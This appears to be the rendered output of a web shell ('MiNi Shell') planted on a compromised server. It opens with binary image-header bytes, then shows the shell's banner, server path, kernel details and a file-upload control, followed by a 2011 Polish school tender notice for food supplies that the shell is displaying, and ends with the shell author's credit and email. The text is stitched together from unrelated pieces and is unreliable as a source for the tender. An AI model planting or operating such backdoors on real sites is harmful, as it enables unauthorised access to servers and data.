JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110124/11808-N-2011.html

<p class="kh_header"><b>Warszawa: Zakup, dostawa i rozładunek różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 11808 - 2011; data zamieszczenia: 24.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 211 z Oddziałami Integracyjnymi im. Janusza Korczaka , ul. Nowy Świat 21A, 00-029 Warszawa, woj. mazowieckie, tel. 22 826 17 47, faks 22 826 17 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sp211.hg.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa i rozładunek różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BUŁKA TARTA, OPAK. TORBA FOLIOWA O POJ 1,8 KG - szt. 50
RYŻ PARABOLICZNY, OPAK. TORBA FOLIOWA O POJ.5,0 KG - szt. 40
MĄKA PSZENNA, OPAK. TORBA PAPIEROWA O POJ.1 KG - szt. 110
PASZTECIK PODLASKI 170 G - szt. 72
OLEJ KUJAWSKI, BUT.PLAST. O POJ. 3 L - szt. 65
KAWA INKA 100G - szt.	14
KASZA MANNA1 KG - kg 20
SÓL 1 KG - szt. 132
SOK MALINOWY, SZKLANA BUTELKA  O POJ. 470 ML - szt. 80
KISIEL OWOCOWY (RÓŻNE SMAKI) BEZ CUKRU, TOREBKA PAPIEROWA - szt. 60
BUDYŃ (RÓŻNE SMAKI) BEZ CUKRU, TOREBKA PAPIEROWA - szt. 256
GALARETKA ALSA (RÓŻNE SMAKI) TOREBKA FOLIOWA 1 KG - szt. 25
BARSZCZ BIAŁY OPAK. PLAST. PUDEŁKO O POJ.1 KG - szt. 10
OLIWA Z OLIWEK Z I-WSZEGO TŁOCZENIA W SZKLANEJ BUTELCE O POJ. 1L - litr 6
NAPÓJ CZEKOLADOWY OPAK. PLAST. PUDEŁKO O POJ.1 KG - kg 4
POWIDŁA ŚLIWKOWE, 310G - szt. 50
ORZECHY WŁOSKIE, 100 G - szt. 240
KAKAO NESQUIK, 600 G - szt.	18
KONCENTRAT POMIDOROWY 1 KG - szt. 35
KETCHUP ŁAGODNY DEVELAY 350 G - szt.	15
MUSZTARDA15 G - szt.	10
DŻEM (RÓŻNE SMAKI) SŁOIK 300 G - szt.	88
MIÓD SPADZIOWY SŁOIK 400 G - kg 35
MAJONEZ DEKORACYJNY SŁOIK 700 ML - szt. 30
RODZYNKI 100G - szt. 240
TUŃCZYK W SOSIE WŁASNYM, 250 - szt. 30
SZCZAW KONSEROWOWY, SŁOIK 385 ML, DEVELAY - szt. 80
GROCH ŁUSKANY, TORBA FOLIOWA O POJ.3 KG - szt. 9
FASOLA BIAŁA, GRUBY JAŚ, OPAK. TORBA FOLIOWA O POJ. 3 KG - szt. 3
KASZA PĄCZAK, 400G - szt. 108
KASZA GRYCZANA, OPAK. TORBA FOLIOWA O POJ. 3 KG - kg 57
KASZA JĘCZMIENNA, OPAK. TORBA FOLIOWA O POJ. 3 KG - kg 24
CHRZAN SŁOIK 250 G - szt. 12
KUKURYDZA KONSERWOWA - szt. 30
ANANAS KONSERWOWY- szt.	20
FASOLA KONSERWOWA CZERWONW	 - szt. 10
BRZOSKWINIA W PUSZCE - szt. 10
NUTELLA SŁOIK 630G - szt. 14
CUKIER WANILIOWY 16 G - szt. 15
CUKIER PUDER 0,5 KG - szt. 22
CUKIER KRYSZTAŁ 1 KG - kg	280
NAPOJE Z WIT. C OPAKOWANIA 1 KG - kg	33
SÓL ZIOŁOWA 1 KG - kg 2
MAKARON ŚWIDERKI, OPAKOWANIE FOLIOWE O POJ. 3 KG - szt.	26
MAKARON SPAGHETTI OPAKOWANIE FOLIOWE O POJ. 3 KG	- szt. 45
MAKARON ALFABETTO OPAKOWANIE FOLIOWE O POJ. 3 KG - szt.	12
MAKARON ŁAZANKI OPAKOWANIE FOLIOWE O POJ. 3 KG - szt. 9
MAKARON KOKARDKI OPAKOWANIE FOLIOWE O POJ. 3 KG - szt. 10
MAKARON RURKA - PENNE OPAKOWANIE FOLIOWQE O POJ. 3 KG - szt. 12
MAKARON NITKA ROSOŁOWA OPAKOWANIE O POJ. 3 KG - szt. 20
BAZYLIA, 300 G - szt.	2
CURRY, 1 KG - szt. 3
CZOSNEK GRANULOWANY, 0,5 KG - szt. 4
GAŁKA MUSZKATOŁOWA, 1 KG - kg	1
IMBIR MIELONY, 600 G - szt.	1
MAJERANEK OTARTY, 250 G -	szt. 8
PIEPRZ ZIOŁOWY,	- szt. 3
PIEPRZ CZARNY ZIARNO, 1 KG	- szt.	1
PIEPRZ KOLOROWY ZIARNO, 0,5 KG	- szt.	2
PAPRYKA SŁODKA MIELONA, 0,5 KG	- szt.	3
PIEPRZ CZARNY MIELONY, 0,5 KG - szt. 2
KURKUMA, 0,5 KG	- szt	1
LIŚĆ LAUROWY, 100G -	szt 3
TYMIANEK, 300 G	- szt	1
ZIELE ANGIELSKIE, 350 G - szt 1
POMIDORY SUSZONE W OLEJU, 470 G - szt 4
SOSY DESEROWE(RÓŻNE SMAKI) BUTELKA O POJ.1 L - szt.	25
MARYNATA DO WOŁOWINY,750 G - szt. 3
DELIKAT DO DROBIU, 600 G - szt.	1
DELIKAT DO GYROSA, 500 G - szt.	2
POMIDORY Z BAZYLIĄ, 600 G - szt.	5
DELIKAT W PŁYNIE, 1 L - litr	14
DELIKAT DO MIĘS, 700 G - szt. 3
PRZYPRAWA DO KURCZAKA, 1,2 KG	- szt.	2
PRZYPRAWA DO MIĘSA MIELONEGO, 1 KG - szt.	1
PRZYPRAWA DO MIĘSA WIEPRZOWEGO, 600G - szt. 1
PRZYPRAWA DO RYB, 800G - szt. 1
FIX DO POTRAW MEKSYKAŃSKICH, 1 KG - szt. 2
FIX DO CHIŃSKICH DAŃ, 1 KG	- szt.	7
MARYNATA DO WIEPRZOWINY, 750 G - szt. 2
PŁATKI CINICMINIS,500G - szt. 18
PŁATKI GOLD FLAKES, 250 G - szt.	14
PŁATKI KUKURYDZIANE, 1 KG - szt.	5
PŁATKI CHERIOS, 250 G	- szt.	4
PŁATKI KANGUS, 250 G - szt.	15
PŁATKI CHOCAPIC, 500G - szt. 15
PŁATKI NESQUIK, 500G - szt. 8
PŁATKI MLEKOŁAKI, 250 G - szt. 100
SOS DO SPAGHETTI NAPOLI, 1,1 KG	 - szt. 10
SOS DO SPAGHETTI BOLOGNE, 1,1 KG - szt. 10
SOS GRZYBOWY, 1 KG - szt. 6
SOS MYŚLIWSKI, 1 KG - szt. 1
SOS HOLENDERSKI, 750 G - szt. 1
SOS 4 SERY Z BROKUŁAMI, 750 G - 	szt. 4
SOS CYGAŃSKI, 850 G - szt. 1
SOS SAŁATKOWY ORIENTALNY, 500G - szt. 1
SOS SAŁATKOWY BAZYLIOWO- CZOSNKOWY - szt. 1
SOS SAŁATKOWY GRECKI, 700 G - szt. 1
SOS SAŁATKOWY KOPERKOWY, 800G - szt. 1
SOS SAŁATKOWY OGRODOWY, 700 G - szt. 1
ZUPA KREM Z BOROWIKÓW, 1 KG - szt. 9
ZUPA KREM BROKUŁOWA, 1 KG - szt. 2
ZUPA KREM Z ZIELONYCH WARZYW, 700 G - szt. 2
ZUPA KREM SZPARAGOWA, 3 KG - szt. 1
ZUPA KREM ZE SZPINAKU, 1 KG - szt. 4
ZUPA KREM Z CZERWONYCH WARZYW, 750 G - szt. 7
ZUPA TOSKAŃSKA, 800 G - szt. 5
ŻUREK, 3 KG - szt. 5
HERBATA PORZECZKOWA, 20TOREBEK - szt. 10
HERBATA BIAŁA MELON - ŚLIWKA, 20 T - szt. 4
HERBATA BIAŁA FIGA - GRUSZKA, 20 T - szt. 6
HERBATA TROPIKALNA Z MIĘTĄ, 20 T - szt. 10
HERBATA OWOCOWY LAS, 20 T - szt. 10
HERBATA RUSSIAN CHERRY, 20 T - szt. 10
HERBATA POZIOMKOWA Z WANILIĄ, 20 T	- szt.	14
HERBATA ZIELONA JAŚMINOWA, 20 T - szt. 2
HERBATA CYTRYNOWA, 20 T	- szt.	6
HERBATA CYTRUSOWA Z IMBIREM, 20 T - szt. 10
HERBATA MALINOWA POLANA,20 T  - szt.	6
HERBATA CUBAN PUNCZ, 20 T	- szt. 4
HERBATA ZIELONA CYTRYNOWA, 20 T - szt. 2
HERBATA IRVING CZARNA, 100 T - szt. 5
HERBATA CZARNA SAGA, 300 T - szt. 7
MIKOŁAJE CZEKOLADOWE, 80G - szt. 240
ZAJĄCE CZEKOLADOWE, 80 G - szt.	240
NESTEA,500ML -	szt. 240
COCA COLA, 330 ML - szt. 240
HERBATNIKI OWSIANE - kg 13
BISZKOPTY OKRĄGŁE,140 G - szt. 180
CZEKOLADOWE NIESPODZIANKI DLA O -	szt. 50
CZEKOLADA, 100 G - szt. 240
ŻELKI HARIBO, 150 G - szt. 240
DELICJE, 147 G -	szt. 78
CRUNCHY ŻURAWINA- MALINA, 70 G - szt. 240
CRUNCHY CZEKOLADA, 70 G -	szt. 240
BATON MILKY WAY - szt. 240
BATON FITNES RÓŻNE SMAKI - szt.	480
BATON KNOPERS - szt.	240
BATON GRZESIEK	- szt.	280
MLECZNA KANAPKA - szt. 2 800
PRINCESSA RÓŻNE SMAKI - szt. 2 400
HERBATNIKI PETITKI, 100 G -	szt. 700
MAKRELA WĘDZONA - kg 10.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się spełnianiem tego warunku składając dokument potwierdzający posiadanie uprawnień do wykonywania określonej działalności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się spełnianiem tego warunku składając oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się spełnianiem tego warunku składając oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się spełnianiem tego warunku składając oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się spełnianiem tego warunku składając oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sp211.hg.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 211 z Oddziałami Integracyjnymi im. Janusza Korczaka, ul. Nowy Świat 21 A, 00-029 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2011 godzina 11:30, miejsce: Sekretariat Szkoły Podstawowej nr 211 z Oddziałami Integracyjnymi im. J. Korczaka przy ul. Nowy Świat 21 A w Warszawie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com